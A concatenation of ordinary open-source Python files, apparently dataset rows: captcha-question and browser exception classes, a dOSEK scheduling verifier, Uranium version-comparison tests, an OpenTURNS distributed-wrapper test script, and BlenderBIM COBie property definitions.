class RecaptchaQuestion(CaptchaQuestion):
    """Google reCAPTCHA challenge identified by a site key and page URL."""
    type = 'g_recaptcha'
    website_key = None
    website_url = None
    def __init__(self, website_key, website_url):
        super(RecaptchaQuestion, self).__init__(self.type, website_key=website_key, website_url=website_url)
class RecaptchaV3Question(CaptchaQuestion):
    """Google reCAPTCHA v3 challenge; carries an optional `action` hint.

    NOTE(review): type is 'g_recaptcha', the same value as the v2 classes
    above — consumers presumably rely on the `action` attribute to tell
    them apart; confirm.
    """
    type = 'g_recaptcha'
    website_key = None
    website_url = None
    action = None
    def __init__(self, website_key, website_url, action=None):
        super(RecaptchaV3Question, self).__init__(self.type, website_key=website_key, website_url=website_url)
        self.action = action
class FuncaptchaQuestion(CaptchaQuestion):
    """FunCaptcha challenge identified by a site key and page URL."""
    type = 'funcaptcha'
    website_key = None
    website_url = None
    # Some sites serve the challenge from a dedicated sub-domain.
    sub_domain = None
    def __init__(self, website_key, website_url, sub_domain=None):
        super(FuncaptchaQuestion, self).__init__(
            self.type, website_key=website_key, website_url=website_url, sub_domain=sub_domain)
class BrowserHTTPNotFound(Exception):
    """HTTP resource not found (inferred from name; confirm raisers)."""
    pass
class BrowserHTTPError(BrowserUnavailable):
    """HTTP-level failure; subclasses BrowserUnavailable (defined elsewhere)."""
    pass
class BrowserHTTPSDowngrade(Exception):
    """HTTPS connection downgraded to HTTP (inferred from name; confirm)."""
    pass
class BrowserSSLError(BrowserUnavailable):
    """SSL/TLS failure while browsing; a kind of BrowserUnavailable."""
    pass
class ParseError(Exception):
    """Content could not be parsed (inferred from name; confirm raisers)."""
    pass
class FormFieldConversionWarning(UserWarning):
    """
    A value set on a form's field was implicitly converted to another type.
    """
class NoAccountsException(Exception):
    """No accounts are available (inferred from name; confirm raisers)."""
    pass
class ModuleInstallError(Exception):
    """Installing a module failed (inferred from name; confirm raisers)."""
    pass
class ModuleLoadError(Exception):
    """Raised when a module cannot be loaded.

    The exception message is ``msg``; ``module`` records the name of the
    module that failed, for callers to inspect.
    """
    def __init__(self, module_name, msg):
        super(ModuleLoadError, self).__init__(msg)
        self.module = module_name
class ActionNeeded(Exception):
    """User action is required before proceeding (see subclasses below)."""
    pass
class AuthMethodNotImplemented(ActionNeeded):
    """The site's authentication method is not implemented here."""
    pass
class BrowserPasswordExpired(ActionNeeded):
    """The password has expired and must be renewed on the site."""
    pass
class NeedInteractive(Exception):
    """Base class: the operation needs an interactive user (see subclasses)."""
    pass
class NeedInteractiveForRedirect(NeedInteractive):
    """
    An authentication is required to connect and credentials are not supplied.
    """
    pass
class NeedInteractiveFor2FA(NeedInteractive):
    """
    A 2FA is required to connect; credentials are supplied but not the
    second factor.
    """
    pass
|
danceos/dosek
|
app/bcc1/task1/verify_a.py
|
from generator.analysis.verifier_tools import *
def after_SystemStateFlow(analysis):
    """Check task-dispatch reachability for the bcc1/task1 system.

    Resolves the three handlers plus Idle and StartOS in the system
    graph, then asserts which subject is reachable after each syscall,
    and finally verifies that every syscall was covered.
    """
    graph = analysis.system_graph
    (Handler11, Handler12, Handler13, Idle, StartOS) = \
        get_functions(graph, ["Handler11", "Handler12", "Handler13", "Idle", "StartOS"])
    toolbox = RunningTaskToolbox(analysis)
    # StartOS hands control to Handler11 first.
    toolbox.reachability(StartOS, "StartOS", [],  # =>
                         [Handler11])
    # Activating Handler12 from Handler11 keeps Handler11 running
    # (Handler11 has the higher priority).
    toolbox.reachability(Handler11, "ActivateTask", [Handler12],  # =>
                         [Handler11])
    # Activating Handler13 dispatches it directly.
    toolbox.reachability(Handler11, "ActivateTask", [Handler13],  # =>
                         [Handler13])
    # When Handler13 terminates, Handler11 resumes.
    toolbox.reachability(Handler13, "TerminateTask", [],  # =>
                         [Handler11])
    # When Handler11 terminates, the pending Handler12 runs.
    toolbox.reachability(Handler11, "TerminateTask", [],  # =>
                         [Handler12])
    # When Handler12 terminates, the system goes idle.
    toolbox.reachability(Handler12, "TerminateTask", [],  # =>
                         [Idle])
    # The Idle loop is never left.
    toolbox.reachability(Idle, "Idle", [],  # =>
                         [Idle])
    toolbox.promise_all_syscalls_checked()
|
Ultimaker/Uranium
|
tests/TestVersion.py
|
# Copyright (c) 2018 Ultimaker B.V.
# Uranium is released under the terms of the LGPLv3 or higher.
from UM.Version import Version
from unittest import TestCase
import pytest
# Spellings that must all parse to the same major-only version "1".
major_versions = [Version("1"), Version(b"1"), Version(1), Version([1]), Version(["1"]), Version("1."), Version("MOD-1"), Version("1B"), Version(Version("1"))]
# Spellings that must all parse to "1.2".
major_minor_versions = [Version("1.2"), Version("1-2"), Version("1_2"), Version(b"1.2"), Version("1.2BETA"), Version([1, 2]), Version(["1", "2"]), Version([1, "2"]), Version([1, b"2"])]
# Spellings that must all parse to "1.2.3".
major_minor_revision_versions = [Version("1.2.3"), Version("1.2.3BETA"), Version("1_2-3"), Version(b"1.2.3"), Version([1, 2, 3]), Version(["1", "2", "3"]), Version([1, "2", 3]), Version("MOD-1.2.3"), Version(["1", 2, b"3"])]
def check_version_equals(first_version: Version, second_version: Version):
    """Assert that two Version objects are equal, overall and per component."""
    assert first_version == second_version
    for getter in ("getMajor", "getMinor", "getRevision"):
        assert getattr(first_version, getter)() == getattr(second_version, getter)()
@pytest.mark.parametrize("first_version", major_versions)
@pytest.mark.parametrize("second_version", major_versions)
def test_major_equals(first_version, second_version):
    # Every pair of major-only spellings must compare equal.
    check_version_equals(first_version, second_version)
@pytest.mark.parametrize("first_version", major_minor_versions)
@pytest.mark.parametrize("second_version", major_minor_versions)
def test_major_and_minor_equals(first_version, second_version):
    # Every pair of major.minor spellings must compare equal.
    check_version_equals(first_version, second_version)
@pytest.mark.parametrize("first_version", major_minor_revision_versions)
@pytest.mark.parametrize("second_version", major_minor_revision_versions)
def test_major_minor_revision_equals(first_version, second_version):
    # Every pair of major.minor.revision spellings must compare equal.
    check_version_equals(first_version, second_version)
@pytest.mark.parametrize("first_version", major_versions)
@pytest.mark.parametrize("second_version", major_minor_versions)
def test_check_version_smaller(first_version, second_version):
    # A major-only version is strictly smaller than any major.minor one.
    assert first_version < second_version
    # Just to be on the really safe side
    assert first_version != second_version
    assert not first_version > second_version
@pytest.mark.parametrize("first_version", major_minor_versions)
@pytest.mark.parametrize("second_version", major_minor_revision_versions)
def test_check_version_smaller_2(first_version, second_version):
    # A major.minor version is strictly smaller than any major.minor.revision one.
    assert first_version < second_version
    # Just to be on the really safe side
    assert first_version != second_version
    assert not first_version > second_version
def test_versionPostfix():
    """A "-alpha.4" postfix exposes its type, its number, and ordering."""
    version = Version("1.2.3-alpha.4")
    assert version.getPostfixType() == "alpha"
    assert version.getPostfixVersion() == 4
    assert version.hasPostFix()
    assert not Version("").hasPostFix()
    assert version <= Version("1.2.3-alpha.5")
    assert version < Version("1.2.3-alpha.5")
def test_versionWeirdCompares():
    # Comparing a Version against a plain int must not report equality.
    version = Version("1.2.3-alpha.4")
    assert not version == 12
def test_wrongType():
    # A None input falls back to version "0".
    version = Version(None)
    assert version == Version("0")
def test_compareStrings():
    """Version supports direct comparison against plain version strings."""
    version_string = "1.0.0"
    version = Version(version_string)
    assert version == version_string
    assert version >= version_string
    assert version < "2.0.0"
    assert version <= "2.0.0"
    assert "0" < version
    # A postfixed (pre-release) version sorts below the plain release.
    assert Version("1.0.0") > Version("1.0.0-alpha.7")
    # Defend people from ignoring the typing.
    assert not version > None
    assert not version < None
def test_compareBeta():
    # A BETA postfix sorts before the plain release of the same version.
    normal_version = Version("1.0.0")
    beta_version = Version("1.0.0-BETA")
    assert normal_version > beta_version
def test_comparePostfixVersion():
    # Postfix numbers compare numerically within the same postfix type.
    assert Version("1.0.0-alpha.1") < Version("1.0.0-alpha.2")
|
dbarbier/privot
|
python/test/t_distributed_python_wrapper.py
|
#! /usr/bin/env python
# -*- coding: utf8 -*-
import openturns as ot
import sys
import shutil
import os
import argparse
import threading
import tempfile
# multicore example:
# ./t_distributed_python_wrapper.py --sample-size 10 --test local
#
# multihost example (need working ssh server):
# ./t_distributed_python_wrapper.py --sample-size 100 --test remote --hosts host1 host2
# todo: add ctrc-c test
# Build the CLI.  add_help=False frees up -h (reused below for --hosts);
# an explicit --help flag is added instead.
parser = argparse.ArgumentParser(description="test openturns "
                                 "distributed-python-wrapper",
                                 add_help=False)
# store_const with const=[]: args.help is [] when --help is passed,
# None otherwise (tested against None further down).
parser.add_argument('--help', action='store_const', const=[],
                    help='show this help message and exit')
parser.add_argument('--debug', '-d', action='store_true',
                    help='print openturns debug\'log')
parser.add_argument('--hosts', '-h', nargs='+')
parser.add_argument('--test', '-t', nargs=1,
                    help='test_type (remote, local)')
parser.add_argument('--point', action='store_true',
                    help='test with one point rather than a sample')
parser.add_argument('--analytical', action='store_true',
                    help='test without separate workdir')
parser.add_argument('--cleanup', '-c', nargs=1,
                    help='cleanup workdirs')
parser.add_argument('--error', '-e', action='store_true',
                    help='make error')
parser.add_argument('--tmpdir', '-w', nargs=1,
                    help='tmpdir')
parser.add_argument('--sample-size', '-s', nargs=1,
                    help='number of points to compute')
parser.add_argument('--work-time', '-p', nargs=1,
                    help='number of second of computing per point')
parser.add_argument('--nb-output', '-n', nargs=1,
                    help='number of output variable')
args = parser.parse_args()
#print "args: " + str(args)

# Show help and stop.  argparse's automatic help is disabled above
# (add_help=False), so it is handled by hand here.
# BUG FIX: the original called printHelp(parser), a name defined nowhere
# in this file, which raised NameError instead of printing help.
if args.help is not None:
    parser.print_help()
    sys.exit(0)
if args.debug:
    ot.Log.Show( ot.Log.Flags() | ot.Log.DBG )
# Translate parsed options into plain module-level variables, applying a
# default when the option was not given.  (`x is not None` replaces the
# non-idiomatic `x != None` throughout.)
hosts = None
if args.hosts is not None:
    hosts = args.hosts
test_type = "local"
if args.test is not None:
    test_type = args.test[0]
test_point = False
if args.point:
    test_point = True
test_analytical = False
if args.analytical:
    test_analytical = True
cleanup = "ok"
if args.cleanup is not None:
    cleanup = args.cleanup[0]
make_error = args.error
tmpdir = ""
if args.tmpdir is not None:
    tmpdir = args.tmpdir[0]
sample_size = 5
if args.sample_size is not None:
    sample_size = int(args.sample_size[0])
work_time = 1
if args.work_time is not None:
    work_time = float(args.work_time[0])
nb_output = 1
if args.nb_output is not None:
    nb_output = int(args.nb_output[0])
# Echo the effective configuration.
print( "test_type:" + test_type + ", test_point:" + str(test_point) + \
    ", test_analytical:" + str(test_analytical) + \
    ", cleanup:" + cleanup + ", make_error:" + \
    str(make_error) + ", tmpdir:" + tmpdir + ", sample_size:" + \
    str(sample_size) + ", work_time:" + str(work_time) + ", hosts:" + \
    str(hosts) + ", nb_output:" + str(nb_output))
# uncomment following line to show wanted logs
#ot.Log.Show( ot.Log.ALL )
#
#ot.Log.Show( ot.Log.Flags() | ot.Log.WRAPPER )
#ot.Log.Show( ot.Log.Flags() | ot.Log.DBG )
# print compute progression :
ot.Log.Show( ot.Log.Flags() | ot.Log.INFO )
# set number of thread = number of job concurrently started
#ResourceMap.Set("parallel-threads", "6")
#print "Nb of thread of localhost: ", ot.ResourceMap.Get("parallel-threads")
# Locate the dummy wrapper/program files shipped next to this test script.
script_dir = os.path.dirname( os.path.realpath( __file__ ) )
program_wrapper = script_dir + os.sep + "dummy_program_wrapper.py"
# NOTE(review): func_wrapper is assigned but never used below — confirm.
func_wrapper = script_dir + os.sep + "dummy_func_wrapper.py"
program = script_dir + os.sep + "dummy_program.py"
# Distributed wrapper: 4 inputs per point, nb_output outputs, dispatched
# to `hosts` (or locally when hosts is None).
dist_func = ot.OpenTURNSDistributedPythonFunction(n_input=4,
                                                  n_output=nb_output,
                                                  wrapper_file=program_wrapper,
                                                  hosts=hosts,
                                                  cleanup=cleanup,
                                                  files_to_send=[program],
                                                  tmpdir=tmpdir)
if test_analytical:
    dist_func.set_separate_workdir(False)
if 'win' not in sys.platform:
    # change group pid in order to avoid wrapper_launcher destroying parent process
    # when interrupting
    os.setpgid(0, 0)
model = ot.NumericalMathFunction( dist_func )
# create sample: each point carries (index, F, work_time, nb_output)
inS = ot.NumericalSample(sample_size, 4)
# F is the multiplier later checked against the outputs; 666 presumably
# makes the dummy program fail — confirm against dummy_program.py.
if not make_error:
    F=2
else:
    F=666
for i in range(sample_size):
    inS[i,0] = i + 1
    inS[i,1] = F
    inS[i,2] = work_time
    inS[i,3] = nb_output
print( 'Compute' )
if make_error:
    # Error scenario: the computation is expected to raise.
    try:
        outS = model( inS )
    except Exception:
        # Narrowed from a bare `except:` so Ctrl-C / SystemExit still work.
        print( '====== An error raised, that\'s ok ======' )
    else:
        # BUG FIX: the original built Exception("ERROR: no exception!")
        # without raising it, so a silently-passing error test went unnoticed.
        raise Exception("ERROR: no exception!")
else:
    if not test_point:
        outS = model( inS )
    else:
        # Single-point mode: evaluate only the first point.
        outS = []
        outS.append( model( inS[0] ) )
        sample_size = 1
print( 'Results' )
# Avoid dumping huge samples to stdout.
if sample_size < 64 and nb_output <= 2:
    print( outS )
# Outputs are deterministic: point i must equal (i + 1) * F.
# (Removed an unused `sum = 0` that shadowed the builtin.)
ok = 1
for i in range(sample_size):
    z = outS[i][0]
    valid_value = (i + 1) * F
    if z != valid_value:
        ok = 0
        print( 'point ' + str(i) + ' incorrect, got value: ' + str(z) + \
            ', valid value is ' + str(valid_value) )
if ok:
    print( 'Results are OK.' )
else:
    print ('!!!!!!!!!!!!!!!ERROR!!!!!!!!!!!!!!!!!' )
    # sys.exit instead of the site-provided exit() builtin.
    sys.exit(1)
# check existing or not workdir
check_workdir_beg = None
check_workdir_end = None
# Guess the workdir path the wrapper used.
workdir = dist_func.wd_hosts_in.remote_tmpdir
if not workdir:
    workdir = tempfile.gettempdir()
workdir += os.sep + dist_func.wd_hosts_in.workdir_basename
if cleanup == "no":
    # With cleanup disabled, one directory per point must remain.
    check_workdir_beg = 0
    check_workdir_end = sample_size
elif cleanup == "ok" and sample_size > 2 and make_error:
    # NOTE(review): range(2, 2) below is empty, so this branch checks no
    # directories at all — confirm whether beg/end were meant to differ.
    check_workdir_beg = 2
    check_workdir_end = 2
if check_workdir_beg is not None:  # idiom fix: was `!= None`
    # todo: check that 0..n directory are there on remote nodes too?
    if test_type == "local":
        workdirs = range(check_workdir_beg, check_workdir_end)
        dirs = os.listdir(workdir)
        for i in workdirs:
            if str(i) not in dirs:
                err_msg = "The directory " + workdir + os.sep + \
                    str(i) + " was not found!"
                print (err_msg)
                raise Exception(err_msg)
        shutil.rmtree(workdir)
        print( 'Workdir found. Cleaned.' )
    else:
        if os.path.exists(workdir):
            raise Exception('The workdir was not cleaned!')
        print( 'Workdir not found: ok.' )
# print an empty line in order to detect exception
print ('')
|
IfcOpenShell/IfcOpenShell
|
src/blenderbim/blenderbim/bim/module/cobie/prop.py
|
# BlenderBIM Add-on - OpenBIM Blender Add-on
# Copyright (C) 2020, 2021 Dion Moult <dion@thinkmoult.com>
#
# This file is part of BlenderBIM Add-on.
#
# BlenderBIM Add-on is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# BlenderBIM Add-on is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with BlenderBIM Add-on. If not, see <http://www.gnu.org/licenses/>.
import bpy
from bpy.types import PropertyGroup
from bpy.props import (
PointerProperty,
StringProperty,
EnumProperty,
BoolProperty,
IntProperty,
FloatProperty,
FloatVectorProperty,
CollectionProperty,
)
class COBieProperties(PropertyGroup):
    """Blender property group holding COBie-related settings.

    NOTE(review): registration and consumption of these properties happen
    elsewhere in the add-on — confirm semantics against the operators.
    """
    # Path of the IFC file used as the COBie data source.
    cobie_ifc_file: StringProperty(default="", name="COBie IFC File")
    # Filter/query for COBie type elements (presumably selector syntax — confirm).
    cobie_types: StringProperty(default=".COBieType", name="COBie Types")
    # Filter/query for COBie component elements.
    cobie_components: StringProperty(default=".COBie", name="COBie Components")
    # Destination path for the exported COBie JSON.
    cobie_json_file: StringProperty(default="", name="COBie JSON File")
    # When True, use the IFC model already loaded in memory instead of the file.
    should_load_from_memory: BoolProperty(default=False, name="Load from Memory")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.